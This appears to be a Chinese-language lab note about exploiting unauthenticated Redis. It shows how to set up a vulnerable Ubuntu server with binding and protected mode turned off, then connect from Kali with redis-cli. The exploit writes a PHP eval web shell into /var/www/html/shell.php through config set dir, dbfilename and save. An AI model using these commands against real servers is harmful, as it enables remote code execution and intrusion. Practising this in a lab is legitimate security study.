Redis未授权访问的利用方式(ubuntu
安装
ubuntu
https://blog.csdn.net/hzlarm/article/details/99432240
sudo apt-get install redis-server
sudo vi /etc/redis/redis.conf
#bind 127.0.0.1
propected-mode no
重启sudo srevice redis restart
kali
https://www.cnblogs.com/littlemood/p/11795761.html
kali攻击ubuntu
未授权访问漏洞
https://www.cnblogs.com/ECJTUACM-873284962/p/9561993.html
https://www.cnblogs.com/yuzly/p/11663822.html
产生条件:
(1)Redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。
ubuntu:192.168.79.129
kali:192.168.79.128
-
通过redis-cli与Redis服务端进行连接,通过Redis未授权直接连接Redis服务端
kali
redis-cli -h 192.168.79.129
可以连接
使用config get dir
命令得到redis备份的路径
(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error. (5.12s)
config set stop-writes-on-bgsave-error no
save一直失败。。。
set 1 '<?php eval($_GET["a"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save